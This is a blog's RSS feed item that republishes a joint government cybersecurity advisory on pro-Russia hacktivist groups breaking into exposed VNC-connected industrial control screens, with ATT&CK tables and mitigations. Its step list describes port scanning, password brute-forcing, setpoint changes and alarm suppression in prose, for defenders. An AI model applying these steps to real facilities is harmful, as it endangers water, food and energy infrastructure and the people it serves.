<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>DiSenso Group LLC &#187; Uncategorized</title>
	<atom:link href="http://disensogroup.com/category/uncategorized/feed/" rel="self" type="application/rss+xml" />
	<link>http://disensogroup.com</link>
	<description>Technology Consultants</description>
	<lastBuildDate>Fri, 05 Dec 2025 19:35:38 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>https://wordpress.org/?v=4.2.39</generator>
	<item>
		<title>Pro-Russia Hacktivists Conduct Opportunistic Attacks Against US and Global Critical Infrastructure</title>
		<link>http://disensogroup.com/pro-russia-hacktivists-conduct-opportunistic-attacks-against-us-and-global-critical-infrastructure/</link>
		<comments>http://disensogroup.com/pro-russia-hacktivists-conduct-opportunistic-attacks-against-us-and-global-critical-infrastructure/#comments</comments>
		<pubDate>Fri, 05 Dec 2025 19:35:38 +0000</pubDate>
		<dc:creator><![CDATA[pdisenso]]></dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[aside format]]></category>

		<guid isPermaLink="false">http://disensogroup.com/pro-russia-hacktivists-conduct-opportunistic-attacks-against-us-and-global-critical-infrastructure/</guid>
		<description><![CDATA[Summary Note: This joint Cybersecurity Advisory is being published as an addition to the Cybersecurity and Infrastructure Security Agency (CISA) May 6, 2025, joint fact sheet Primary Mitigations to Reduce Cyber Threats to Operational Technology and European Cybercrime Centre’s (EC3) Operation Eastwood, in which CISA, Federal Bureau of Investigation (FBI), Department of Energy (DOE), Environmental...]]></description>
				<content:encoded><![CDATA[<h2><strong>Summary</strong></h2>
<p><strong>Note:</strong> This joint Cybersecurity Advisory is being published as an addition to the Cybersecurity and Infrastructure Security Agency (CISA) May 6, 2025, joint fact sheet <a href="https://www.cisa.gov/resources-tools/resources/primary-mitigations-reduce-cyber-threats-operational-technology" title="Primary Mitigations to Reduce Cyber Threats to Operational Technology">Primary Mitigations to Reduce Cyber Threats to Operational Technology</a> and European Cybercrime Centre’s (EC3) <a href="https://www.europol.europa.eu/media-press/newsroom/news/global-operation-targets-noname05716-pro-russian-cybercrime-network" target="_blank" title="Operation Eastwood">Operation Eastwood</a>, in which CISA, Federal Bureau of Investigation (FBI), Department of Energy (DOE), Environmental Protection Agency (EPA), and EC3 shared information about cyber incidents affecting the operational technology (OT) and industrial control systems (ICS) of critical infrastructure entities in the United States and globally.</p>
<p>FBI, CISA, National Security Agency (NSA), and the following partners—hereafter referred to as “the authoring organizations”—are releasing this joint advisory on the targeting of critical infrastructure by pro-Russia hacktivists:</p>
<ul>
<li>U.S. Department of Energy (DOE)</li>
<li>U.S. Environmental Protection Agency (EPA)</li>
<li>U.S. Department of Defense Cyber Crime Center (DC3)</li>
<li>Europol European Cybercrime Centre (EC3)</li>
<li>EUROJUST – European Union Agency for Criminal Justice Cooperation</li>
<li>Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC)</li>
<li>Canadian Centre for Cyber Security (Cyber Centre)</li>
<li>Canadian Security Intelligence Service (CSIS)</li>
<li>Czech Republic Military Intelligence (VZ)</li>
<li>Czech Republic National Cyber and Information Security Agency (NÚKIB)</li>
<li>Czech Republic National Centre Against Terrorism, Extremism, and Cyber Crime (NCTEKK)</li>
<li>French National Cybercrime Unit – Gendarmerie Nationale (UNC)</li>
<li>French National Jurisdiction for the Fight Against Organized Crime (JUNALCO)</li>
<li>German Federal Office for Information Security (BSI)</li>
<li>Italian State Police (PS)</li>
<li>Latvian State Police (VP)</li>
<li>Lithuanian Criminal Police Bureau (LKPB)</li>
<li>New Zealand National Cyber Security Centre (NCSC-NZ)</li>
<li>Romanian National Police (PR)</li>
<li>Spanish Civil Guard (GC)</li>
<li>Spanish National Police (CNP)</li>
<li>Swedish Polisen (SC3)</li>
<li>United Kingdom National Cyber Security Centre (NCSC-UK)</li>
</ul>
<p>The authoring organizations assess pro-Russia hacktivist groups are conducting less sophisticated, lower-impact attacks against critical infrastructure entities, compared to advanced persistent threat (APT) groups. These attacks use minimally secured, internet-facing virtual network computing (VNC) connections to infiltrate (or gain access to) OT control devices within critical infrastructure systems. Pro-Russia hacktivist groups—Cyber Army of Russia Reborn (CARR), Z-Pentest, NoName057(16), Sector16, and affiliated groups—are capitalizing on the widespread prevalence of accessible VNC devices to execute attacks against critical infrastructure entities, resulting in varying degrees of impact, including physical damage. Targeted sectors include <a href="https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/water-and-wastewater-sector" title="Water and Wastewater Systems">Water and Wastewater Systems</a>, <a href="https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/food-and-agriculture-sector" title="Food and Agriculture Sector">Food and Agriculture</a>, and <a href="https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/energy-sector" title="Energy Sector">Energy</a>.</p>
<p>The authoring organizations encourage critical infrastructure organizations to implement the recommendations in the <a href="#Mitigations" title="Mitigations"><strong>Mitigations </strong></a>section of this advisory to reduce the likelihood and impact of pro-Russia hacktivist-related incidents. For additional information on Russian state-sponsored malicious cyber activity, see CISA’s <a href="https://www.cisa.gov/topics/cyber-threats-and-advisories/advanced-persistent-threats/russia" title="Russia Threat Overview and Advisories">Russia Threat Overview and Advisories</a> webpage.</p>
<p>Download the PDF version of this report:</p>
<div class="c-file">
<div class="c-file__download">
    <a href="https://www.cisa.gov/sites/default/files/2025-12/aa25-343a-pro-russia-hacktivists-conduct-attacks.pdf" class="c-file__link" target="_blank">Pro-Russia Hacktivists Conduct Opportunistic Attacks Against US and Global Critical Infrastructure</a><br />
    <span class="c-file__size">(PDF,       1.65 MB<br />
  )</span>
  </div>
</div>
<h2><strong>Background and Development of Pro-Russia Hacktivist Groups</strong></h2>
<p>Over the past several years, the authoring organizations have observed pro-Russia hacktivist groups conducting cyber operations against numerous organizations and critical infrastructure sectors worldwide. The escalation of the Russia-Ukraine conflict in 2022 significantly increased the number of these pro-Russia groups. Consisting of individuals who support Russia’s agenda but lack direct governmental ties, most of these groups target Ukrainian and allied infrastructure. However, among the increasing number of groups, some appear to have associations with the Russian state through direct or indirect support.</p>
<h3><strong>Cyber Army of Russia Reborn</strong></h3>
<p>The authoring organizations assess that the Russian General Staff Main Intelligence Directorate (GRU) Main Center for Special Technologies (GTsST) military unit 74455—tracked in the cybersecurity community under several names (see<strong> </strong><a href="#AppB" title="Appendix B"><strong>Appendix B: Additional Designators Used for Cited Groups</strong></a>)—is likely responsible for supporting the creation of CARR —also known as “The People’s Cyber Army of Russia”—in late February or early March of 2022. Actors suspected to be from GRU unit 74455 likely funded the tools CARR threat actors used to conduct distributed denial-of-service (DDoS) attacks through at least September 2024.</p>
<p>In April 2022, the group began using a new Telegram channel featuring the name “CyberArmyofRussia_Reborn” to organize and plan group actions. The channel creators recruited actors to use CARR as an unattributable platform for conducting cyber activities beneath the level of an APT, aimed at deterring anti-Russia rhetoric. CARR threat actors presented themselves as a group of pro-Russia hacktivists supporting Russia’s stance on the Ukrainian conflict, and they soon began claiming responsibility for DDoS attacks against the U.S. and Europe for supporting Ukraine.</p>
<p>CARR documented these actions through embellished images and videos shared on their social media channels, promoting Russian ideology, disseminating talking points, and publicizing leaked information from hacks attributed to Russian state threat actors.</p>
<p>In late 2023, CARR expanded their operations to include attacks on industrial control systems (ICS), claiming an intrusion against a European wastewater treatment facility in October 2023. In November 2023, CARR targeted human-machine interface (HMI) devices, claiming intrusions at two U.S. dairy farms.</p>
<p>The authoring organizations assess that by late September 2024, CARR channel administrators became dissatisfied with the level of support and funding provided by the GRU. This dissatisfaction led CARR administrators and an administrator from another hacktivist group, NoName057(16), to create the Z-Pentest group, employing the same tactics, techniques, and procedures (TTPs) as CARR but separate from GRU involvement.</p>
<h3><strong>NoName057(16)</strong></h3>
<p>The authoring organizations assess that the Center for the Study and Network Monitoring of the Youth Environment (CISM), established on behalf of the Kremlin, created NoName057(16) as a covert project within the organization. Senior executives and employees within CISM developed and customized the NoName057(16) proprietary DDoS tool <code>DDoSia</code>, paid for the group’s network infrastructure, served as administrators on NoName057(16) Telegram channels, and selected DDoS targets.</p>
<p>Active since March 2022, NoName057(16) has conducted frequent DDoS attacks against government and private sector entities in North Atlantic Treaty Organization (NATO) member states and other European countries perceived as hostile to Russian geopolitical interests. The group operates primarily through Telegram channels and used GitHub, alongside various websites and repositories, to host <code>DDoSia</code> and share materials and TTPs with their followers.&nbsp;</p>
<p>In 2024, NoName057(16) began collaborating closely with other pro-Russia hacktivist groups, operating a joint chat with CARR by mid-2024. In July 2024, NoName057(16) jointly claimed responsibility with CARR for an alleged intrusion against OT assets in the U.S. The high degree of cooperation with CARR likely contributed to the formation of Z-Pentest, which is composed of actors and administrators from both teams, in September 2024.</p>
<h3><strong>Z-Pentest</strong></h3>
<p>Established in September 2024, Z-Pentest is composed of members from CARR and NoName057(16). The group specializes in OT intrusion operations targeting globally dispersed critical infrastructure entities. Additionally, the group uses “hack and leak” operations and defacement attacks to draw attention to their pro-Russia messaging. Unlike other pro-Russia hacktivist groups, Z-Pentest largely avoids DDoS activities, claiming OT intrusions as attempts to garner more attention from the media.</p>
<p>Shortly after Z-Pentest’s inception, the group announced alliances with CARR and NoName057(16), possibly to leverage the other groups’ subscribers to grow the new channel. In March 2025, Z-Pentest posted evidence claiming OT device intrusions to their channel using a NoName057(16) cyberattack campaign hashtag. Similarly, in April 2025, Z-Pentest shared a video purporting defacement of an HMI by changing system names to NoName057(16) and CARR references. Z-Pentest continues to create new alliances with other groups, like Sector16, to continue growing their subscriber base and incidentally propagate TTPs with new partners.</p>
<h3><strong>Sector16</strong></h3>
<p>Formed in January 2025, Sector16 is a novice pro-Russia hacktivist group that emerged through collaboration with Z-Pentest. Sector16 actively maintains an online presence, including a public Telegram channel where they share videos, statements, and claims of compromising U.S. energy infrastructure. These communications often align with pro-Russia narratives and reflect their self-proclaimed support for Russian geopolitical objectives.</p>
<p>Members of Sector16 may have received indirect support from the Russian government in exchange for conducting specific cyber operations that further Russian strategic goals. This aligns with broader Russian cyber strategies that involve leveraging non-state threat actors for certain cyber activities, adding a layer of deniability.</p>
<h2><strong>Technical Details</strong></h2>
<p><strong>Note:</strong> This advisory uses the MITRE ATT&amp;CK<sup>®</sup> <a href="https://attack.mitre.org/versions/v18/matrices/enterprise/" title="Matrix for Enterprise framework">Matrix for Enterprise framework</a>, version 18.&nbsp;See the <a href="#MITRE" title="MITRE ATT&amp;CK Tactics and Techniques"><strong>MITRE ATT&amp;CK Tactics and Techniques</strong></a> section of this advisory for a table of the threat actors’ activity mapped to MITRE ATT&amp;CK tactics and techniques.</p>
<h3><strong>TTP Overview</strong></h3>
<p>Pro-Russia hacktivist groups employ easily disseminated and replicated TTPs across various entities, increasing the likelihood of widespread adoption and escalating the frequency of intrusions. These groups have limited capabilities, frequently misunderstanding the processes they aim to disrupt. Their apparent low level of technical knowledge results in haphazard attacks where actors intend to cause physical damage but cannot accurately anticipate actual impact. Despite these limitations, the authoring organizations have observed these groups willfully cause actual harm to vulnerable critical infrastructure.</p>
<p>Pro-Russia hacktivist groups use the TTPs in this Cybersecurity Advisory to target virtual network computing (VNC)-connected HMI devices. These groups are primarily seeking notoriety with their actions. While they have caused damage in some instances, they regularly make false or exaggerated claims about their attacks on critical infrastructure to garner more attention. They frequently misrepresent their capabilities and the impacts of their actions, portraying minor incursions as significant breaches, but such incursions can still lead to lost time and resources for operators remediating systems.</p>
<p>Additionally, pro-Russia hacktivists use an opportunistic targeting methodology. They leverage superficial criteria, such as victim availability and existing vulnerabilities, rather than focusing on strategically significant entities. Their lack of strategic focus can lead to a broad array of targets, ranging from water treatment facilities to oil well systems. Pro-Russia hacktivists have demonstrated a pattern of frequently taking advantage of the widespread availability of vulnerable VNC connections. While system owners typically use VNC connections for legitimate remote system access functions, threat actors can maliciously use these connections to broadly target numerous platforms and services. Consequently, these groups can indiscriminately compromise critical infrastructure entities, including those in the <a href="https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/water-and-wastewater-sector" title="Water and Wastewater Sector">Water and Wastewater</a>, <a href="https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/food-and-agriculture-sector" title="Food and Agriculture Sector">Food and Agriculture</a>, and <a href="https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/energy-sector" title="Energy Sector">Energy</a> Sectors.</p>
<p>Pro-Russia hacktivist groups have successfully targeted supervisory control and data acquisition (SCADA) networks using basic methods, and in some cases, performed simultaneous DDoS attacks against targeted networks to facilitate SCADA intrusions. As recently as April 2025, threat actors used the following unsophisticated TTPs to access networks and conduct SCADA intrusions:</p>
<ul>
<li>Scan for vulnerable devices on the internet [<a href="https://attack.mitre.org/versions/v18/techniques/T0883/" target="_blank" title="T0883">T0883</a>] with open VNC ports [<a href="https://attack.mitre.org/versions/v18/techniques/T1595/002/" target="_blank" title="T1595.002">T1595.002</a>].</li>
<li>Initiate temporary virtual private server (VPS) [<a href="https://attack.mitre.org/versions/v18/techniques/T1583/003/" target="_blank" title="T1583.003">T1583.003</a>] to execute password brute force software.</li>
<li>Use VNC software to access hosts [<a href="https://attack.mitre.org/versions/v18/techniques/T1021/005/" target="_blank" title="T1021.005">T1021.005</a>].</li>
<li>Confirm connection to the vulnerable device [<a href="https://attack.mitre.org/versions/v18/techniques/T0886/" target="_blank" title="T0886">T0886</a>].</li>
<li>Brute force the password, if required [<a href="https://attack.mitre.org/versions/v18/techniques/T1110/003/" target="_blank" title="T1110.003">T1110.003</a>].</li>
<li>Gain access to HMI devices [<a href="https://attack.mitre.org/versions/v18/techniques/T0883/" target="_blank" title="T0883">T0883</a>], typically with default [<a href="https://attack.mitre.org/versions/v18/techniques/T0812/" target="_blank" title="T0812">T0812</a>], weak, or no passwords [<a href="https://attack.mitre.org/versions/v18/techniques/T0859/" target="_blank" title="T0859">T0859</a>].</li>
<li>Log the confirmed vulnerable device IP address, port, and password.</li>
<li>Using the HMI graphical interface [<a href="https://attack.mitre.org/versions/v18/techniques/T0823/" target="_blank" title="T0823">T0823</a>], capture screen recordings or intermittent screenshots while conducting the following actions, intending to affect productivity and cause additional costs [<a href="https://attack.mitre.org/versions/v18/techniques/T0828/" target="_blank" title="T0828">T0828</a>]:
<ul>
<li>Modify usernames/passwords [<a href="https://attack.mitre.org/versions/v18/techniques/T0892/" target="_blank" title="T0892">T0892</a>];</li>
<li>Modify parameters [<a href="https://attack.mitre.org/versions/v18/techniques/T0836/" target="_blank" title="T0836">T0836</a>];</li>
<li>Modify device name [<a href="https://attack.mitre.org/versions/v18/techniques/T0892/" target="_blank" title="T0892">T0892</a>];</li>
<li>Modify instrument settings [<a href="https://attack.mitre.org/versions/v18/techniques/T0831/" target="_blank" title="T0831">T0831</a>];</li>
<li>Disable alarms [<a href="https://attack.mitre.org/versions/v18/techniques/T0878/" target="_blank" title="T0878">T0878</a>];</li>
<li>Create loss of view (a technique that mandates local hands-on operator intervention) [<a href="https://attack.mitre.org/versions/v18/techniques/T0829/" target="_blank" title="T0829">T0829</a>]; and/or</li>
<li>Device restart or shutdown [<a href="https://attack.mitre.org/versions/v18/techniques/T0816/" target="_blank" title="T0816">T0816</a>].</li>
</ul>
</li>
<li>Disconnect from the device, ending the VNC connection.</li>
<li>Research the compromised device company after the intrusion [<a href="https://attack.mitre.org/versions/v18/techniques/T1591/" target="_blank" title="T1591">T1591</a>].</li>
</ul>
<h4><strong>Propagation</strong></h4>
<p>To reach a wider audience, pro-Russia hacktivist groups work together, amplify each other’s posts, create additional groups to amplify their own posts, and likely share TTPs. For example, Z-Pentest jointly claimed intrusion of a U.S. system with Sector16. Sector16 later began posting additional intrusions for which the group claimed sole responsibility. It is likely that these and similar groups will continue to iterate and share these methods to disrupt critical infrastructure organizations.</p>
<h4><strong>Reconnaissance and Initial Access</strong></h4>
<p>The threat actors’ intrusion methodology is relatively unsophisticated, inexpensive to execute, and easy to replicate. These pro-Russia hacktivist groups abuse popular internet-scraping tools, such as <code>Nmap</code> or <code>OPENVAS</code>, to search for visible VNC services and use brute force password spraying tools to access devices via known default or otherwise weak credentials. Threat actors typically search for these services on the default port <code>5900</code> or other nearby ports (<code>5901-5910</code>). Their goal is to gain remote access to HMI devices connected to live control networks.</p>
<p>Once threat actors obtain access, they manipulate available settings from the graphical user interface (GUI) on the HMI devices, such as arbitrary physical parameter and setpoint changes, or conduct defacement activities. Because pro-Russia hacktivist groups seem to lack sector-specific expertise or cyber-physical engineering knowledge, they currently cannot reliably estimate the true impact of their actions. Regardless of outcome, pro-Russia hacktivist groups often post images and screen recordings to their social media platforms, boasting the compromises and exaggerating impacts to garner attention from their peers and the media.</p>
<h4><strong>Impact</strong></h4>
<p>While pro-Russia hacktivist groups currently demonstrate limited ability to consistently cause significant impact, there is a risk that their continued attacks will result in further harm or grievous physical consequences. Attacks have not yet caused injury; however, the attacks against occupied factories and community facilities demonstrate a lack of consideration for human safety.</p>
<p>Victim organizations reported that the most common operational impact caused by these threat actors is a temporary loss of view, necessitating manual intervention to manage processes. However, any modifications to programmatic and systematic procedures can result in damage or disruption, including substantial labor costs from hiring a programmable logic controller programmer to restore operations, costs associated with operational downtime, and potential costs for network remediation.</p>
<h2><a class="ck-anchor" id="MITRE"><strong>MITRE ATT&amp;CK Tactics and Techniques</strong></a></h2>
<p>See <a href="#Table1" title="Table 1"><strong>Table 1</strong></a> to <a href="#Table10" title="Table 10"><strong>Table 10</strong></a> for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&amp;CK framework, see CISA and MITRE ATT&amp;CK’s <a href="https://www.cisa.gov/news-events/news/best-practices-mitre-attckr-mapping" title="Best Practices for MITRE ATT&amp;CK Mapping">Best Practices for MITRE ATT&amp;CK Mapping</a> and CISA’s <a href="https://github.com/cisagov/Decider/" title="Decider Tool">Decider Tool</a>.</p>
<p><a class="ck-anchor" id="Table1"></a></p>
<table class="tablesaw tablesaw-stack">
<caption><em>Table 1. Reconnaissance</em></caption>
<thead>
<tr>
<th role="columnheader"><strong>Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Gather Victim Organization Information</td>
<td><a href="https://attack.mitre.org/versions/v18/techniques/T1591/" target="_blank" title="T1591">T1591</a></td>
<td>Threat actors use information available on the internet to determine what systems they believe they have compromised and post the information on their social media. This methodology frequently leads to the threat actors misidentifying their claimed victims.</td>
</tr>
<tr>
<td>Active Scanning: Vulnerability Scanning</td>
<td><a href="https://attack.mitre.org/versions/v18/techniques/T1595/002/" target="_blank" title="T1595.002">T1595.002</a></td>
<td>Threat actors use open source tools to look for IP addresses in target countries with visible VNC services on common ports.</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack">
<caption><em>Table 2. Resource Development</em></caption>
<thead>
<tr>
<th role="columnheader"><strong>Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Acquire Infrastructure: Virtual Private Server</td>
<td><a href="https://attack.mitre.org/versions/v18/techniques/T1583/003/" target="_blank" title="T1583.003">T1583.003</a></td>
<td>Threat actors use virtual infrastructure to obfuscate identifiers.</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack">
<caption><em>Table 3. Initial Access</em></caption>
<thead>
<tr>
<th role="columnheader"><strong>Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Internet Accessible Device</td>
<td><a href="https://attack.mitre.org/versions/v18/techniques/T0883/" target="_blank" title="T0883">T0883</a></td>
<td>Threat actors gain access through less secure HMI devices exposed to the internet.</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack">
<caption><em>Table 4. Persistence</em></caption>
<thead>
<tr>
<th role="columnheader"><strong>Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Valid Accounts</td>
<td><a href="https://attack.mitre.org/versions/v18/techniques/T0859/" target="_blank" title="T0859">T0859</a></td>
<td>Threat actors use password guessing tools to access legitimate accounts on the HMI devices.</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack">
<caption><em>Table 5. Credential Access</em></caption>
<thead>
<tr>
<th role="columnheader"><strong>Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Brute Force: Password Spraying</td>
<td><a href="https://attack.mitre.org/versions/v18/techniques/T1110/003/" target="_blank" title="T1110.003">T1110.003</a></td>
<td>Threat actors use tools to rapidly guess common or simple passwords.</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack">
<caption><em>Table 6. Lateral Movement</em></caption>
<thead>
<tr>
<th role="columnheader"><strong>Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Default Credentials</td>
<td><a href="https://attack.mitre.org/versions/v18/techniques/T0812/" target="_blank" title="T0812">T0812</a></td>
<td>Threat actors seek and build libraries of known default passwords for control devices to access legitimate user accounts.</td>
</tr>
<tr>
<td>Remote Services</td>
<td><a href="https://attack.mitre.org/versions/v18/techniques/T0886/" target="_blank" title="T0886">T0886</a></td>
<td>Threat actors leverage VNC services to access system HMI devices.</td>
</tr>
<tr>
<td>Remote Services: VNC</td>
<td><a href="https://attack.mitre.org/versions/v18/techniques/T1021/005/" target="_blank" title="T1021.005">T1021.005</a></td>
<td>Threat actors hunt VNC-enabled devices visible on the internet and connect with remote viewer software.</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack">
<caption><em>Table 7. Execution</em></caption>
<thead>
<tr>
<th role="columnheader"><strong>Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Graphical User Interface</td>
<td><a href="https://attack.mitre.org/versions/v18/techniques/T0823/" target="_blank" title="T0823">T0823</a></td>
<td>Threat actors interact with HMI devices via GUIs, attempting to modify control devices.</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack">
<caption><em>Table 8. Inhibit Response Function</em></caption>
<thead>
<tr>
<th role="columnheader"><strong>Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Device Restart/Shutdown</td>
<td><a href="https://attack.mitre.org/versions/v18/techniques/T0816/" target="_blank" title="T0816">T0816</a></td>
<td>While threat actors claim to turn off HMIs, it is possible that operators (not the threat actors) turn the devices off during incident response.</td>
</tr>
<tr>
<td>Alarm Suppression</td>
<td><a href="https://attack.mitre.org/versions/v18/techniques/T0878/" target="_blank" title="T0878">T0878</a></td>
<td>Threat actors use HMI interfaces to clear alarms caused by their activity and alarms already present on the system at the time of their intrusion.</td>
</tr>
<tr>
<td>Change Credential</td>
<td><a href="https://attack.mitre.org/versions/v18/techniques/T0892/" target="_blank" title="T0892">T0892</a></td>
<td>Threat actors change the usernames and passwords of HMI devices in operator lockout attempts, usually resulting in a loss of view and operators switching to manual operations.</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack">
<caption><em>Table 9. Impair Process Control</em></caption>
<thead>
<tr>
<th role="columnheader">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Modify Parameter</td>
<td><a href="https://attack.mitre.org/versions/v18/techniques/T0836/" target="_blank" title="T0836">T0836</a></td>
<td>Threat actors attempt to change upper and lower limits of operational devices as available from the HMI.</td>
</tr>
<tr>
<td>Unauthorized Command Message</td>
<td><a href="https://attack.mitre.org/techniques/T0855/" target="_blank" title="T0855">T0855</a></td>
<td>Threat actors attempt to send unauthorized command messages to instruct control system assets to perform actions outside of their intended functionality, causing possible impact.</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack">
<caption><em>Table 10. Impact</em></caption>
<thead>
<tr>
<th role="columnheader"><a class="ck-anchor" id="Table10"><strong>Technique Title</strong></a></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Loss of Productivity and Revenue</td>
<td><a href="https://attack.mitre.org/versions/v18/techniques/T0828/" target="_blank" title="T0828">T0828</a></td>
<td>Threat actors purposefully attempt to impact productivity and create additional costs for the affected entities.</td>
</tr>
<tr>
<td>Loss of View</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T0829/" target="_blank" title="T0829">T0829</a></td>
<td>Threat actors change credentials on HMI devices, preventing operators from modifying processes remotely.&nbsp;</td>
</tr>
<tr>
<td>Manipulation of Control</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T0831/" target="_blank" title="T0831">T0831</a></td>
<td>Threat actors change setpoints in processes, impacting the efficiency of operations for those specific processes. &nbsp;</td>
</tr>
</tbody>
</table>
<h2><strong>Incident Response</strong></h2>
<p>If organizations find exposed systems with weak or default passwords, they should assume threat actors compromised the system and begin the following incident response protocols:</p>
<ol>
<li><strong>Determine which hosts were compromised and isolate them</strong> by quarantining or taking them offline.</li>
<li><strong>Initiate threat hunting activities to scope the intrusion</strong>. Collect and review artifacts, such as running processes/services, unusual authentications, and recent network connections.</li>
<li><strong>Reimage compromised hosts</strong>.</li>
<li><strong>Provision new account credentials</strong>.</li>
<li><strong>Report the compromise to CISA, FBI, and/or NSA</strong>. See the <a href="#Contact" title="Contact Information"><strong>Contact Information</strong></a> section of this advisory.</li>
<li><strong>Harden the network to prevent additional malicious activity</strong>. See the <a href="#Mitigations" title="Mitigations "><strong>Mitigations </strong></a>section of this advisory for guidance.</li>
</ol>
<h2><a class="ck-anchor" id="Mitigations"><strong>Mitigations</strong></a></h2>
<h3><strong>OT Asset Owners and Operators</strong></h3>
<p>The authoring organizations recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture based on the threat actors’ activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s <a href="https://www.cisa.gov/cpg" title="CPGs webpage">CPGs webpage</a> for more information on the CPGs, including additional recommended baseline protections.</p>
<ul>
<li><strong>Reduce exposure of OT assets to the public-facing internet.</strong> When connected to the internet, OT devices are easy targets for malicious cyber threat actors. Many devices can be found by searching for open ports on public IP ranges with search engine tools to target victims with OT components [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#LimitOTConnectionstoPublicInternet2X" title="CPG 2.X">CPG 2.X</a>].
<ul>
<li><strong>Asset owners should use attack surface management services&nbsp;</strong>and web-based search platforms to scan the internet. This mitigation can help identify if there are VNC systems exposed within the IP ranges they own, especially for connections set up by third parties.<br /><strong>Note:</strong> For more information on attack surface management, see CISA’s <a href="https://www.cisa.gov/resources-tools/resources/exposure-reduction" title="Internet Exposure Reduction Guidance">Internet Exposure Reduction Guidance</a>, CISA’s <a href="https://www.cisa.gov/cyber-hygiene-services" title="Cyber Hygiene Services">Cyber Hygiene Services</a> for U.S. critical infrastructure, and NSA’s <a href="https://www.nsa.gov/Portals/75/documents/resources/everyone/Attack%20Surface%20Management%20copy.pdf" target="_blank" title="Attack Surface Management">Attack Surface Management</a> for the U.S. Defense Industrial Base.</li>
<li><strong>Implement network segmentation between IT and OT networks.</strong> Segmenting critical systems and introducing a demilitarized zone (DMZ) for passing control data to enterprise logistics reduces the potential impact of cyber threats and the risk of disruptions to essential OT operations [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#NetworkSegmentation2F" title="CPG 2.F">CPG 2.F</a>].</li>
<li><strong>Consider implementing a firewall and/or virtual private network</strong> if exposure to the internet is necessary for controlling access to devices.
<ul>
<li>Consider disabling public exposure by default and implementing time-limited remote access to reduce the amount of time systems are exposed.</li>
<li>Restrict and monitor both inbound and outbound traffic at OT perimeter firewalls. Configure OT perimeter firewalls to enforce a default-deny policy for all traffic. Asset owners should explicitly permit authorized destinations and protocols based on operational requirements.</li>
<li>Implement strict egress filtering to prevent unauthorized data exfiltration or command-and-control callbacks.</li>
<li>Regularly audit firewall rulesets and monitor outbound traffic patterns for anomalies indicative of threat actor activity, such as beaconing or unexpected protocol usage.</li>
</ul>
</li>
</ul>
</li>
<li><strong>Adopt mature asset management processes</strong>, including mapping data flows and access points. Generating a complete picture of both OT and IT assets provides visibility to operators and management, allowing organizations to monitor and assess deviations for criticality [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#AssetInventory1A" title="CPG 1.A">CPG 1.A</a>].
<ul>
<li><strong>Keep remote access services updated&nbsp;</strong>with the latest version available and ensure all systems and software are up to date with patches and necessary security updates.
<ul>
<li>Keep VNC systems updated with the latest version available.</li>
</ul>
</li>
